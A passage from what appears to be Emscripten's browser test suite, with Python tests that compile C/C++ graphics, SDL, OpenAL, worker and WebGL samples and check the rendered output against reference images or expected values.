self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS=1', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE=1', '-O2', '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], ['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=[] + opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],
['-s', 'OFFSCREEN_FRAMEBUFFER=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],
[]]:
self.btest(path_from_root('tests', 'html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
